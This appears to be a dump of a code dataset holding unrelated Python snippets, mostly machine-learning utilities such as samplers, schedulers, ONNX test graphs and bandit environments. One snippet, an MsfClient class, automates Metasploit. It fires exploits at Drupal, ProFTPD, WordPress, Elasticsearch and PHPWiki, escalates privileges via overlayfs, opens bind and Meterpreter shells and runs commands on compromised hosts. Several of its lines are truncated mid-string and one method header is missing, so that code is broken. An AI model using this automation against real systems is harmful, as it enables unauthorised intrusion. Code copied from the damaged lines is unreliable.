code stringlengths 101 5.91M |
|---|
class RandomSubsetTrainingSampler(TrainingSampler):
def __init__(self, size: int, subset_ratio: float, shuffle: bool=True, seed_shuffle: Optional[int]=None, seed_subset: Optional[int]=None):
super().__init__(size=size, shuffle=shuffle, seed=seed_shuffle)
assert (0.0 < subset_ratio <= 1.0)
self._size_subset = int((size * subset_ratio))
assert (self._size_subset > 0)
if (seed_subset is None):
seed_subset = comm.shared_random_seed()
self._seed_subset = int(seed_subset)
g = torch.Generator()
g.manual_seed(self._seed_subset)
indexes_randperm = torch.randperm(self._size, generator=g)
self._indexes_subset = indexes_randperm[:self._size_subset]
logger.info('Using RandomSubsetTrainingSampler......')
logger.info(f'Randomly sample {self._size_subset} data from the original {self._size} data')
def _infinite_indices(self):
g = torch.Generator()
g.manual_seed(self._seed)
while True:
if self._shuffle:
randperm = torch.randperm(self._size_subset, generator=g)
(yield from self._indexes_subset[randperm].tolist())
else:
(yield from self._indexes_subset.tolist()) |
def validate(a_l, b_l, c_l, a_u, b_u, c_u, x_minus, x_plus, y_minus, y_plus, verify_and_modify_all=False, max_iter=100, plot=False, eps=1e-05, print_info=True):
original_shape = c_l.shape
a_l_new = a_l.view((- 1))
b_l_new = b_l.view((- 1))
c_l_new = c_l.view((- 1))
a_u_new = a_u.view((- 1))
b_u_new = b_u.view((- 1))
c_u_new = c_u.view((- 1))
x_minus_new = x_minus.view((- 1))
x_plus_new = x_plus.view((- 1))
y_minus_new = y_minus.view((- 1))
y_plus_new = y_plus.view((- 1))
N = a_l_new.size(0)
if verify_and_modify_all:
max_iter = N
for i in range(max_iter):
if verify_and_modify_all:
n = i
else:
n = torch.randint(0, N, [1])
n = n.long()
(hl_fl, hu_fu) = plot_2_surface(x_minus_new[n], x_plus_new[n], y_minus_new[n], y_plus_new[n], a_l_new[n], b_l_new[n], c_l_new[n], a_u_new[n], b_u_new[n], c_u_new[n], plot=plot)
if print_info:
print(('tanh sigmoid iter: %d num: %d hl-f max %.6f mean %.6f hu-f min %.6f mean %.6f' % (i, n, hl_fl.max(), hl_fl.mean(), hu_fu.min(), hu_fu.mean())))
if (hl_fl.max() > eps):
print(x_minus_new[n], x_plus_new[n], y_minus_new[n], y_plus_new[n], a_l_new[n], b_l_new[n], c_l_new[n], a_u_new[n], b_u_new[n], c_u_new[n])
plot_surface(x_minus_new[n], x_plus_new[n], y_minus_new[n], y_plus_new[n], a_l_new[n], b_l_new[n], c_l_new[n])
print('hl-f max', hl_fl.max())
raise Exception('lower plane fail')
break
if ((hl_fl.max() > 0) and verify_and_modify_all):
c_l_new[n] = (c_l_new[n] - (hl_fl.max() * 2))
if (hu_fu.min() < (- eps)):
print(x_minus_new[n], x_plus_new[n], y_minus_new[n], y_plus_new[n], a_l_new[n], b_l_new[n], c_l_new[n], a_u_new[n], b_u_new[n], c_u_new[n])
plot_surface(x_minus_new[n], x_plus_new[n], y_minus_new[n], y_plus_new[n], a_u_new[n], b_u_new[n], c_u_new[n])
print('hu-f min', hu_fu.min())
raise Exception('upper plane fail')
break
if ((hu_fu.min() < 0) and verify_and_modify_all):
c_u_new[n] = (c_u_new[n] - (hu_fu.min() * 2))
c_l_new = c_l_new.view(original_shape)
c_u_new = c_u_new.view(original_shape)
return (c_l_new, c_u_new) |
def prepare_dataset(training_file: str, K: int=None):
sessions = read_sessions_from_training_file(training_file, K)
(x, y) = prepare_training_data(sessions)
return {'X': x, 'y': y} |
_registry
class MSETuneStrategy(TuneStrategy):
def __init__(self, model, conf, q_dataloader=None, q_func=None, eval_func=None, eval_dataloader=None, eval_metric=None, resume=None, q_hooks=None):
super().__init__(model=model, conf=conf, q_dataloader=q_dataloader, q_func=q_func, eval_func=eval_func, eval_dataloader=eval_dataloader, eval_metric=eval_metric, resume=resume, q_hooks=q_hooks)
logger.info('*** Initialize MSE tuning')
self.ordered_ops = None
def __getstate__(self):
for history in self.tuning_history:
if self._same_conf(history['cfg'], self.conf):
history['ordered_ops'] = self.ordered_ops
save_dict = super().__getstate__()
return save_dict
def _mse_metric_gap(self, fp32_tensor, dequantize_tensor):
fp32_max = np.max(fp32_tensor)
fp32_min = np.min(fp32_tensor)
dequantize_max = np.max(dequantize_tensor)
dequantize_min = np.min(dequantize_tensor)
fp32_tensor = ((fp32_tensor - fp32_min) / (fp32_max - fp32_min))
dequantize_tensor = ((dequantize_tensor - dequantize_min) / (dequantize_max - dequantize_min))
diff_tensor = (fp32_tensor - dequantize_tensor)
euclidean_dist = np.sum((diff_tensor ** 2))
return (euclidean_dist / fp32_tensor.size)
def mse_impact_lst(self, op_list: List, fp32_model, best_qmodel):
op_name_lst = [element[0] for element in op_list]
op_mapping = {}
for (op_name, op_type) in list(op_list):
op_mapping[op_name] = (op_name, op_type)
current_best_tune_cfg = self._tune_cfg_converter(self.cur_best_tuning_cfg)
fp32_dump_content = self.adaptor.inspect_tensor(fp32_model, self.calib_dataloader, op_name_lst, [1], inspect_type='activation', save_to_disk=True, save_path='./nc_workspace/', quantization_cfg=current_best_tune_cfg)
fp32_tensor_dict = fp32_dump_content['activation'][0]
best_qmodel = self.adaptor.quantize(current_best_tune_cfg, self.model, self.calib_dataloader, self.q_func)
quant_dump_content = self.adaptor.inspect_tensor(best_qmodel, self.calib_dataloader, op_name_lst, [1], inspect_type='activation', save_to_disk=True, save_path='./nc_workspace/', quantization_cfg=current_best_tune_cfg)
dequantize_tensor_dict = quant_dump_content['activation'][0]
ops_mse = {op: self._mse_metric_gap(list(fp32_tensor_dict[op].values())[0], list(dequantize_tensor_dict[op].values())[0]) for op in fp32_tensor_dict}
ordered_op_names = sorted(ops_mse.keys(), key=(lambda key: ops_mse[key]), reverse=self.higher_is_better)
ordered_op_name_types = [op_mapping[name] for name in ordered_op_names]
return ordered_op_name_types
def next_tune_cfg(self):
tuning_space = self.tuning_space
calib_sampling_size_lst = tuning_space.root_item.get_option_by_name('calib_sampling_size').options
for calib_sampling_size in calib_sampling_size_lst:
(op_item_dtype_dict, quant_mode_wise_items, initial_op_tuning_cfg) = self.initial_tuning_cfg()
early_stop_tuning = True
stage1_cnt = 0
int8_ops = (quant_mode_wise_items['static'] if ('static' in quant_mode_wise_items) else [])
int8_ops += (quant_mode_wise_items['dynamic'] if ('dynamic' in quant_mode_wise_items) else [])
stage1_max = min(5, len(int8_ops))
op_wise_tuning_sampler = OpTypeWiseTuningSampler(tuning_space, [], [], op_item_dtype_dict, initial_op_tuning_cfg)
for op_tuning_cfg in op_wise_tuning_sampler:
stage1_cnt += 1
if (early_stop_tuning and (stage1_cnt > stage1_max)):
logger.info('Early stopping the stage 1.')
break
op_tuning_cfg['calib_sampling_size'] = calib_sampling_size
(yield op_tuning_cfg)
static_dynamic_items = [item for item in tuning_space.query_items_by_quant_mode('static') if (item in tuning_space.query_items_by_quant_mode('dynamic'))]
if static_dynamic_items:
logger.info('Fallback all ops that support both dynamic and static to dynamic.')
else:
logger.info('No op support both dynamic and static')
new_op_tuning_cfg = deepcopy(self.cur_best_tuning_cfg)
for item in static_dynamic_items:
new_op_tuning_cfg[item.name] = self.initial_dynamic_cfg_based_on_static_cfg(new_op_tuning_cfg[item.name])
new_op_tuning_cfg['calib_sampling_size'] = calib_sampling_size
(yield new_op_tuning_cfg)
best_op_tuning_cfg_stage1 = deepcopy(self.cur_best_tuning_cfg)
for target_dtype in ['bf16', 'fp32']:
fallback_items_lst = [item for item in int8_ops if (item in tuning_space.query_items_by_quant_mode(target_dtype))]
if fallback_items_lst:
logger.info(f'Start to fallback op to {target_dtype} one by one.')
fallback_items_name_lst = [item.name for item in fallback_items_lst]
ordered_op_name_types = self.mse_impact_lst(fallback_items_name_lst, self.model, self.best_qmodel)
self.ordered_ops = [op_name for (op_name, op_type) in ordered_op_name_types]
op_dtypes = OrderedDict(zip(ordered_op_name_types, ([target_dtype] * len(fallback_items_name_lst))))
initial_op_tuning_cfg = deepcopy(best_op_tuning_cfg_stage1)
fallback_sampler = FallbackTuningSampler(tuning_space, tuning_order_lst=[], initial_op_tuning_cfg=initial_op_tuning_cfg, op_dtypes=op_dtypes, accumulate=False)
op_fallback_acc_impact = OrderedDict()
for (op_index, op_tuning_cfg) in enumerate(fallback_sampler):
op_tuning_cfg['calib_sampling_size'] = calib_sampling_size
(yield op_tuning_cfg)
(acc, _) = self.last_tune_result
op_fallback_acc_impact[fallback_items_name_lst[op_index]] = acc
if (len(op_fallback_acc_impact) > 0):
ordered_ops = sorted(op_fallback_acc_impact.keys(), key=(lambda key: op_fallback_acc_impact[key]), reverse=self.higher_is_better)
op_dtypes = OrderedDict(zip(ordered_ops, ([target_dtype] * len(fallback_items_name_lst))))
logger.info(f'Start to accumulate fallback to {target_dtype}.')
initial_op_tuning_cfg = deepcopy(best_op_tuning_cfg_stage1)
fallback_sampler = FallbackTuningSampler(tuning_space, tuning_order_lst=[], initial_op_tuning_cfg=initial_op_tuning_cfg, op_dtypes=op_dtypes, accumulate=True)
for op_tuning_cfg in fallback_sampler:
op_tuning_cfg['calib_sampling_size'] = calib_sampling_size
(yield op_tuning_cfg) |
class MsfClient():
def __init__(self, password, lhost, host='127.0.0.1', port=55553):
self.logger = logging.getLogger('MsfClient')
self.logger.info(f'Connecting to msfrpcd at {host}:{port}')
self.client = MsfRpcClient(password, host=host, port=port, ssl=True)
self.lhost = lhost
self.console = self.client.consoles.console()
def get_sessions(self):
return self.client.sessions.list
def get_sessions_filtered(self, ip=None, user=None, session_type=None):
sessions = self.get_sessions()
if (ip is not None):
sessions = {k: v for (k, v) in sessions.items() if (v['target_host'] == ip)}
if (user is not None):
sessions = {k: v for (k, v) in sessions.items() if (v['username'] == user)}
if (session_type is not None):
sessions = {k: v for (k, v) in sessions.items() if (v['type'] == session_type)}
return sessions
def run_shell_command(self, session_id, cmd, os='linux'):
session = self.get_sessions()[str(session_id)]
self.logger.info(f"Running `{cmd}` at #{session_id} ({session['session_host']})")
session_cmd = self.client.sessions.session(str(session_id))
if (os == 'linux'):
command_string = f'{cmd}'
elif (os == 'windows'):
command_string = f'cmd /c "{cmd}"'
else:
raise RuntimeError(f'Unknown OS {os}.')
result = self.run_module(module_type='post', module_name='multi/general/execute', module_params={'COMMAND': command_string, 'SESSION': int(session_id)})
def find_between(s, first, last):
try:
start = (s.index(first) + len(first))
end = s.index(last, start)
return s[start:end]
except ValueError:
return ''
result = find_between(result, '[*] Response: ', '[*] Post module execution completed')
result = result.rstrip()
return result
def wait_for_job(self, job_id, timeout=0):
seconds_elapsed = 0
while True:
jobs = self.client.jobs.list
if ((timeout > 0) and (seconds_elapsed >= timeout)):
self.client.jobs.stop(job_id)
return False
if (str(job_id) not in jobs.keys()):
return True
time.sleep(1)
seconds_elapsed += 1
def get_session_id(self, result, rhost):
result = [line for line in result.split('\n') if ('[*] Session ' in line)]
if (len(result) == 0):
self.logger.info('No session created.')
return None
session_id = re.match('.* Session (\\d+) created .*', result[0]).group(1)
self.logger.info(f'Opened new session #{session_id} for {rhost}')
return session_id
def run_module(self, module_type, module_name, module_params, payload_name=None, payload_params=None, forced_params=None, run_with_console=True, verbose=False):
self.logger.info(f'Executing {module_type}:{module_name} with params {module_params}')
module = self.client.modules.use(module_type, module_name)
for (pkey, pval) in module_params.items():
if (pkey == 'target'):
module.target = pval
else:
module[pkey] = pval
if verbose:
module.runoptions['VERBOSE'] = 'true'
module.runoptions['DEBUG'] = 'true'
if (payload_name is not None):
payload = self.client.modules.use('payload', payload_name)
for (pkey, pval) in payload_params.items():
if (pkey == 'encoder'):
payload.runoptions[pkey] = pval
else:
payload[pkey] = pval
else:
payload = None
if (forced_params is not None):
for (pkey, pval) in forced_params.items():
module._runopts[pkey] = pval
if run_with_console:
output = self.console.run_module_with_output(module, payload=payload, timeout=180)
self.logger.debug(output)
return output
else:
job = module.execute(payload=payload)
job_id = job['job_id']
self.wait_for_job(job_id)
return None
def run_msf_command(self, cmd):
self.logger.info(f'Executing msfconsole command: `{cmd}`')
console = self.console
console.read()
console.write(cmd)
output = ''
timer = 0
timeout = 300
while ((output == '') or console.is_busy()):
time.sleep(5)
output += console.read()['data']
timer += 5
if (timer > timeout):
break
self.logger.debug(output)
return output
def add_route(self, ip, mask, session_id):
cmd = f'route add {ip}/{mask} {session_id}'
self.run_msf_command(cmd)
def exploit_drupal_coder_exec(self, rhost):
result = self.run_module(module_type='exploit', module_name='unix/webapp/drupal_coder_exec', module_params={'RHOSTS': rhost, 'TARGETURI': '/drupal'}, payload_name='cmd/unix/bind_netcat', payload_params={'LPORT': 8181})
return self.get_session_id(result, rhost)
def exploit_proftpd_modcopy_exec(self, rhost):
result = self.run_module(module_type='exploit', module_name='unix/ftp/proftpd_modcopy_exec', module_params={'RHOSTS': rhost, 'SITEPATH': '/var/www/uploads/', 'TARGETURI': '/uploads/'}, payload_name='cmd/unix/bind_perl', payload_params={'LPORT': 8181})
return self.get_session_id(result, rhost)
def exploit_wp_ninja_forms_unauthenticated_file_upload(self, rhost):
result = self.run_module(module_type='exploit', module_name='multi/ module_params={'RHOSTS': rhost, 'TARGETURI': '/wordpress/', 'FORM_PATH': 'index.php/king-of-hearts/', 'RPORT': '80', 'AllowNoCleanup': True}, payload_name='php/download_exec', payload_params={'URL': '
result = self.run_module(module_type='exploit', module_name='multi/handler', module_params={}, payload_name='windows/meterpreter/bind_tcp', payload_params={'RHOST': rhost, 'LPORT': 4444})
return self.get_session_id(result, rhost)
def exploit_elasticsearch_script_mvel_rce(self, rhost):
result = self.run_module(module_type='exploit', module_name='multi/elasticsearch/script_mvel_rce', module_params={'RHOSTS': rhost}, payload_name='java/meterpreter/bind_tcp', payload_params={'LPORT': 4444}, forced_params={'LHOST': None})
return self.get_session_id(result, rhost)
def exploit_phpwiki_ploticus_exec(self, rhost):
result = self.run_module(module_type='exploit', module_name='multi/ module_params={'RHOSTS': rhost, 'TARGETURI': '/phpwiki/'}, payload_name='generic/shell_bind_tcp', payload_params={'LPORT': 8181, 'encoder': 'php/base64'})
return self.get_session_id(result, rhost)
def privesc_overlayfs_priv_esc(self, rhost, session_id):
result = self.run_module(module_type='exploit', module_name='linux/local/overlayfs_priv_esc', module_params={'SESSION': session_id, 'target': 0}, payload_name='linux/x86/shell/bind_tcp', payload_params={'RHOST': rhost, 'LPORT': 8181})
return self.get_session_id(result, rhost)
def post_shell_to_meterpreter(self, session_id):
self.run_module(module_type='post', module_name='multi/manage/shell_to_meterpreter', module_params={'SESSION': session_id, 'LPORT': 8181, 'HANDLER': False, 'PAYLOAD_OVERRIDE': 'linux/x86/meterpreter/bind_tcp'})
time.sleep(5)
rhost = self.get_sessions()[str(session_id)]['target_host']
result = self.run_module(module_type='exploit', module_name='multi/handler', module_params={}, payload_name='linux/x86/meterpreter/bind_tcp', payload_params={'RHOST': rhost, 'LPORT': 8181})
return self.get_session_id(result, rhost)
def scan_portscan(self, rhosts, ports, threads=10):
result = self.run_module(module_type='auxiliary', module_name='scanner/portscan/tcp', module_params={'RHOSTS': rhosts, 'PORTS': ports, 'THREADS': threads})
result = [line for line in result.split('\n') if ('TCP OPEN' in line)]
result = [re.match('.*- ([\\.\\d:]+) - .*', x).group(1) for x in result]
self.logger.info(f'Scan result: {result}')
return result
def scan_dir_scanner(self, rhosts, port, threads=1):
result = self.run_module(module_type='auxiliary', module_name='scanner/ module_params={'RHOSTS': rhosts, 'RPORT': port, 'THREADS': threads, 'DICTIONARY': '/vagrant/ run_with_console=True)
result = [line for line in result.split('\n') if (('[+] Found' in line) and (' 200 ' in line))]
print(result)
result = [re.match('.* [0-9]+ .*', x).group(1) for x in result]
self.logger.info(f'Folders found on the Http service: {result}')
return result
def scan_ping_sweep(self, rhosts, session_id):
result = self.run_module(module_type='post', module_name='multi/gather/ping_sweep', module_params={'RHOSTS': rhosts, 'SESSION': session_id})
result = [line for line in result.split('\n') if ('host found' in line)]
result = [re.match('.*\\t([\\.\\d]+) .*', x).group(1) for x in result]
self.logger.info(f'Scan result: {result}')
return result
def scan_os_smb(self, rhost):
result = self.run_module(module_type='auxiliary', module_name='scanner/smb/smb_version', module_params={'RHOSTS': rhost}, run_with_console=True)
nresult = []
for line in result.split('\n'):
if ('Host is running' in line):
nresult.append(('linux' if ('Samba' in line) else ('windows' if ('Windows' in line) else None)))
elif ('Host could not be identified:' in line):
nresult.append(('linux' if ('Samba' in line) else ('windows' if (re.search('Windows.*Windows', line) is not None) else None)))
self.logger.info(f'Scan result: {nresult}')
return nresult
def get_os_by_cmd(self, session_id):
if ('Linux' in self.run_shell_command(session_id, 'uname')):
return 'linux'
if ('Windows' in self.run_shell_command(session_id, 'cmd /c ver', os='windows')):
return 'windows'
if ('Linux' in self.run_shell_command(session_id, 'cat /proc/version')):
return 'linux'
self.logger.warning(f'Os detection failed for session {session_id}')
return None
def is_session_meterpreter(self, session_id):
sessions = self.get_sessions()
if (session_id not in sessions):
self.logger.warning(f'Impossible to check session type, session {session_id} not found')
return False
return (sessions[session_id]['type'] == 'meterpreter') |
def dobldobl_solve(pols, verbose=True, tasks=0, dictionary_output=False, verbose_level=0):
from phcpy.phcpy2c3 import py2c_syscon_clear_dobldobl_Laurent_system
from phcpy.phcpy2c3 import py2c_syscon_initialize_number_of_dobldobl_Laurentials
from phcpy.phcpy2c3 import py2c_syscon_store_dobldobl_Laurential
from phcpy.phcpy2c3 import py2c_solcon_clear_dobldobl_solutions
from phcpy.phcpy2c3 import py2c_solve_dobldobl_Laurent_system
from phcpy.interface import load_dobldobl_solutions
py2c_syscon_clear_dobldobl_Laurent_system()
py2c_solcon_clear_dobldobl_solutions()
dim = len(pols)
py2c_syscon_initialize_number_of_dobldobl_Laurentials(dim)
for ind in range(0, dim):
pol = pols[ind]
nchar = len(pol)
py2c_syscon_store_dobldobl_Laurential(nchar, dim, (ind + 1), pol)
silent = (not verbose)
if silent:
py2c_solve_dobldobl_Laurent_system(silent, tasks, verbose_level)
else:
(rc, counts) = py2c_solve_dobldobl_Laurent_system(silent, tasks, verbose_level)
if (counts != ''):
print(counts)
sols = load_dobldobl_solutions()
if dictionary_output:
from phcpy.solutions import formdictlist
return formdictlist(sols, 'dd')
else:
return sols |
class CascadingBandit(Environment):
def __init__(self, num_items, num_positions, a0, b0):
assert (num_items >= num_positions)
self.num_items = num_items
self.num_positions = num_positions
self.a0 = a0
self.b0 = b0
self.probs = np.array([np.random.beta(a0, b0) for a in range(num_items)])
probs_ordered = np.sort(self.probs)[::(- 1)]
self.optimal_reward = (1 - np.prod((1 - probs_ordered[:num_positions])))
self.round_failure = []
self.round_success = []
def get_observation(self):
observation = {'round_failure': self.round_failure, 'round_success': self.round_success}
return observation
def get_optimal_reward(self):
return self.optimal_reward
def get_expected_reward(self, action_list):
assert (len(action_list) == self.num_positions)
action_probs = self.probs[action_list]
expected_reward = (1 - np.prod((1 - action_probs)))
return expected_reward
def get_stochastic_reward(self, action_list):
assert (len(action_list) == self.num_positions)
self.round_failure = []
self.round_success = []
for action in action_list:
click = np.random.binomial(1, self.probs[action])
if (click == 1):
self.round_success += [action]
return click
else:
self.round_failure += [action]
return 0 |
class SimpleDatasetPredictor(DatasetPredictorBase):
def __init__(self, config, dataset):
super(SimpleDatasetPredictor, self).__init__(config, dataset)
self.predictor = OfflinePredictor(config)
def get_result(self):
self.dataset.reset_state()
try:
sz = self.dataset.size()
except NotImplementedError:
sz = 0
with get_tqdm(total=sz, disable=(sz == 0)) as pbar:
for dp in self.dataset.get_data():
res = self.predictor(dp)
(yield res)
pbar.update() |
def get_bound_for_relu(l, u, adaptive=False):
device = l.device
ku = torch.zeros(u.shape, device=device)
bu = torch.zeros(u.shape, device=device)
kl = torch.zeros(l.shape, device=device)
bl = torch.zeros(l.shape, device=device)
idx = (l >= 0)
kl[idx] = 1
ku[idx] = 1
idx = ((l < 0) * (u > 0))
k = (u / (u - l))[idx]
b = ((1 - k) * u[idx])
ku[idx] = k
bu[idx] = b
if (not adaptive):
kl[idx] = k
else:
idx = (((l < 0) * (u > 0)) * (u.abs() >= l.abs()))
kl[idx] = 1
idx = (((l < 0) * (u > 0)) * (u.abs() < l.abs()))
kl[idx] = 0
return (kl, bl, ku, bu) |
def four_models(df, name, startday, k, three=False, c0=1, mu=0.5):
lin_future_predictions = []
sep_exp_future_predictions = []
shared_exp_future_predictions = []
ensemble = []
for i in range(startday, ((df.shape[0] - k) + 1)):
tmp = df[:i]
d = {'Name': [name], 'hospitalizations': [tmp]}
df_mod = pd.DataFrame(data=d)
shared_future_pred = fit_and_predict_shared_exponential(df_mod, mode='predict_future', outcome='hospitalizations', demographic_vars=[], target_day=np.array([k]), verbose=False)
shared_exp_future_predictions.append(shared_future_pred[0][0])
if (three == False):
ensemble_future_prediction = fit_and_predict_ensemble(df_mod, target_day=np.array([k]), outcome='hospitalizations', methods=[shared_exponential, linear], mode='predict_future', verbose=False, weight_c0=c0, weight_mu=mu)[('predicted_hospitalizations_ensemble_' + str(k))].values[0][0]
ensemble.append(ensemble_future_prediction)
tmp = tmp.reshape(1, tmp.shape[0])
lin_pred_future = linear_fit(tmp, 'predict_future', target_day=np.array([k]))
lin_future_predictions.append(lin_pred_future[0][0])
sep_exp_pred_future = exponential_fit(tmp, 'predict_future', target_day=np.array([k]))
sep_exp_future_predictions.append(sep_exp_pred_future[0][0])
return [np.array(lin_future_predictions), np.array(sep_exp_future_predictions), np.array(shared_exp_future_predictions), np.array(ensemble)] |
def build_ox_model2():
A = helper.make_tensor_value_info('A', TensorProto.FLOAT, [1, 5, 5])
D = helper.make_tensor_value_info('D', TensorProto.FLOAT, [1, 5, 2])
H = helper.make_tensor_value_info('H', TensorProto.FLOAT, [1, 5, 2])
F = helper.make_tensor_value_info('F', TensorProto.FLOAT, [1, 5, 2])
e_value = np.random.randint(2, size=10).astype(np.float32)
B_init = helper.make_tensor('B', TensorProto.FLOAT, [5, 2], e_value.reshape(10).tolist())
E_init = helper.make_tensor('E', TensorProto.FLOAT, [1, 5, 2], e_value.reshape(10).tolist())
matmul_node = onnx.helper.make_node('MatMul', ['A', 'B'], ['C'], name='Matmul')
add = onnx.helper.make_node('Add', ['C', 'E'], ['D'], name='add')
add2 = onnx.helper.make_node('Add', ['D', 'F'], ['H'], name='add2')
graph = helper.make_graph([matmul_node, add, add2], 'test_graph_1', [A, F], [H], [B_init, E_init])
model = helper.make_model(graph)
model = helper.make_model(graph, **{'opset_imports': [helper.make_opsetid('', 13)]})
return model |
class Classifier(object):
def __init__(self, D_layers):
self.D_layers = D_layers
self.params = []
for layer in self.D_layers:
self.params = (self.params + layer.params)
def encode(self, input):
output = input
for layer in self.D_layers:
output = layer.encode(output)
return output
def get_name(self):
return 'classifier' |
class CyclicLR(_LRScheduler):
def __init__(self, optimizer, base_lr, max_lr, step_size_up=2000, step_size_down=None, mode='triangular', gamma=1.0, scale_fn=None, scale_mode='cycle', cycle_momentum=True, base_momentum=0.8, max_momentum=0.9, last_epoch=(- 1)):
self.optimizer = optimizer
base_lrs = self._format_param('base_lr', optimizer, base_lr)
if (last_epoch == (- 1)):
for (lr, group) in zip(base_lrs, optimizer.param_groups):
group['lr'] = lr
self.max_lrs = self._format_param('max_lr', optimizer, max_lr)
step_size_up = float(step_size_up)
step_size_down = (float(step_size_down) if (step_size_down is not None) else step_size_up)
self.total_size = (step_size_up + step_size_down)
self.step_ratio = (step_size_up / self.total_size)
if ((mode not in ['triangular', 'triangular2', 'exp_range']) and (scale_fn is None)):
raise ValueError('mode is invalid and scale_fn is None')
self.mode = mode
self.gamma = gamma
if (scale_fn is None):
if (self.mode == 'triangular'):
self.scale_fn = self._triangular_scale_fn
self.scale_mode = 'cycle'
elif (self.mode == 'triangular2'):
self.scale_fn = self._triangular2_scale_fn
self.scale_mode = 'cycle'
elif (self.mode == 'exp_range'):
self.scale_fn = self._exp_range_scale_fn
self.scale_mode = 'iterations'
else:
self.scale_fn = scale_fn
self.scale_mode = scale_mode
self.cycle_momentum = cycle_momentum
if cycle_momentum:
if ('momentum' not in optimizer.defaults):
raise ValueError('optimizer must support momentum with `cycle_momentum` option enabled')
base_momentums = self._format_param('base_momentum', optimizer, base_momentum)
if (last_epoch == (- 1)):
for (momentum, group) in zip(base_momentums, optimizer.param_groups):
group['momentum'] = momentum
self.base_momentums = list(map((lambda group: group['momentum']), optimizer.param_groups))
self.max_momentums = self._format_param('max_momentum', optimizer, max_momentum)
super(CyclicLR, self).__init__(optimizer, last_epoch)
def _format_param(self, name, optimizer, param):
if isinstance(param, (list, tuple)):
if (len(param) != len(optimizer.param_groups)):
raise ValueError('expected {} values for {}, got {}'.format(len(optimizer.param_groups), name, len(param)))
return param
else:
return ([param] * len(optimizer.param_groups))
def _triangular_scale_fn(self, x):
return 1.0
def _triangular2_scale_fn(self, x):
return (1 / (2.0 ** (x - 1)))
def _exp_range_scale_fn(self, x):
return (self.gamma ** x)
def get_lr(self):
cycle = math.floor((1 + (self.last_epoch / self.total_size)))
x = ((1.0 + (self.last_epoch / self.total_size)) - cycle)
if (x <= self.step_ratio):
scale_factor = (x / self.step_ratio)
else:
scale_factor = ((x - 1) / (self.step_ratio - 1))
lrs = []
for (base_lr, max_lr) in zip(self.base_lrs, self.max_lrs):
base_height = ((max_lr - base_lr) * scale_factor)
if (self.scale_mode == 'cycle'):
lr = (base_lr + (base_height * self.scale_fn(cycle)))
else:
lr = (base_lr + (base_height * self.scale_fn(self.last_epoch)))
lrs.append(lr)
if self.cycle_momentum:
momentums = []
for (base_momentum, max_momentum) in zip(self.base_momentums, self.max_momentums):
base_height = ((max_momentum - base_momentum) * scale_factor)
if (self.scale_mode == 'cycle'):
momentum = (max_momentum - (base_height * self.scale_fn(cycle)))
else:
momentum = (max_momentum - (base_height * self.scale_fn(self.last_epoch)))
momentums.append(momentum)
for (param_group, momentum) in zip(self.optimizer.param_groups, momentums):
param_group['momentum'] = momentum
return lrs |
def main():
app = gui.Application.instance
app.initialize()
pcd_data = o3d.data.DemoICPPointClouds()
cloud = o3d.io.read_point_cloud(pcd_data.paths[0])
ex = ExampleApp(cloud)
app.run() |
def unique(results):
total_dupes = 0
total = 0
for res in results:
original_num = len(res)
test_data = set(res)
new_num = len(test_data)
total_dupes += (original_num - new_num)
total += original_num
return (1 - (total_dupes / float(total))) |
def parse_guidance_query(query):
messages = []
start_tokens = ['{{#system~}}', '{{#assistant~}}', '{{#user~}}']
position = (- 1)
next_token = None
for token in start_tokens:
next_position = query.find(token)
if ((next_position != (- 1)) and ((position == (- 1)) or (next_position < position))):
position = next_position
next_token = token
if (next_token == start_tokens[0]):
end_pos = query.find('{{~/system}}')
messages.append({'role': 'system', 'content': query[(position + len(start_tokens[0])):end_pos].strip()})
if (next_token == start_tokens[1]):
end_pos = query.find('{{~/assistant}}')
messages.append({'role': 'assistant', 'content': query[(position + len(start_tokens[1])):end_pos].strip()})
if (next_token == start_tokens[2]):
end_pos = query.find('{{~/user}}')
messages.append({'role': 'user', 'content': query[(position + len(start_tokens[2])):end_pos].strip()})
if ((next_token is not None) and (len(query[end_pos:]) > 15)):
messages.extend(parse_guidance_query(query[end_pos:]))
return messages |
def output_ranklist(img_results, img_infos, out_file):
assert utils.is_type_list(img_results, dict)
assert utils.is_type_list(img_infos, dict)
assert isinstance(out_file, str)
assert out_file.endswith('json')
sorted_results = []
for (idx, result) in enumerate(img_results):
name = img_infos[idx]['file_name']
img_result = result
img_result['file_name'] = name
sorted_results.append(img_result)
sorted_results = sorted(sorted_results, key=itemgetter('hmean'), reverse=False)
mmcv.dump(sorted_results, file=out_file)
return sorted_results |
def load_adaptive_records(path, algo):
records = []
for (i, subdir) in tqdm.tqdm(list(enumerate(os.listdir(path))), ncols=80, leave=False):
results_path = os.path.join(path, subdir, 'results_{}.jsonl'.format(algo))
try:
with open(results_path, 'r') as f:
for line in f:
records.append(json.loads(line[:(- 1)]))
except IOError:
pass
return Q(records) |
class TqdmProgressFileReader():
def __init__(self, f: io.BufferedReader):
self.f = f
self.total_size = os.fstat(f.fileno()).st_size
self.pbar = tqdm(total=self.total_size, leave=False)
self.read = f.read
f.read = self._read
def _read(self, n=(- 1)):
self.pbar.update(n)
return self.read(n)
def close(self):
self.pbar.close() |
class ApproxExploitabilityP2SROManagerLogger(SimpleP2SROManagerLogger):
def __init__(self, p2sro_manger, log_dir: str, scenario: PSROScenario):
super(ApproxExploitabilityP2SROManagerLogger, self).__init__(p2sro_manger=p2sro_manger, log_dir=log_dir)
self._scenario = scenario
self._exploitability_per_generation = []
self._total_steps_per_generation = []
self._total_episodes_per_generation = []
self._num_policies_per_generation = []
self._payoff_table_checkpoint_nums = []
self._payoff_table_checkpoint_paths = []
self._policy_nums_checkpoint_paths = []
self._exploitability_stats_save_path = os.path.join(log_dir, 'approx_exploitability_stats.json')
ensure_dir(self._exploitability_stats_save_path)
def on_active_policy_moved_to_fixed(self, player: int, policy_num: int, fixed_policy_spec: StrategySpec):
current_checkpoint_num = self.get_current_checkpoint_num()
super(ApproxExploitabilityP2SROManagerLogger, self).on_active_policy_moved_to_fixed(player=player, policy_num=policy_num, fixed_policy_spec=fixed_policy_spec)
data = self._manager.get_copy_of_latest_data()
(latest_payoff_table, active_policy_nums_per_player, fixed_policy_nums_per_player) = data
if ((len(fixed_policy_nums_per_player[0]) < 1) or (len(fixed_policy_nums_per_player[1]) < 1)):
return
if (not np.array_equal(fixed_policy_nums_per_player[0], fixed_policy_nums_per_player[1])):
return
n_policies = len(fixed_policy_nums_per_player[0])
latest_policy_index = max(fixed_policy_nums_per_player[0])
policy_spec_added_this_gen = [latest_payoff_table.get_spec_for_player_and_pure_strat_index(player=p, pure_strat_index=(n_policies - 1)) for p in range(2)]
exploitability_this_gen = np.mean([policy_spec_added_this_gen[p].metadata['average_br_reward'] for p in range(2)])
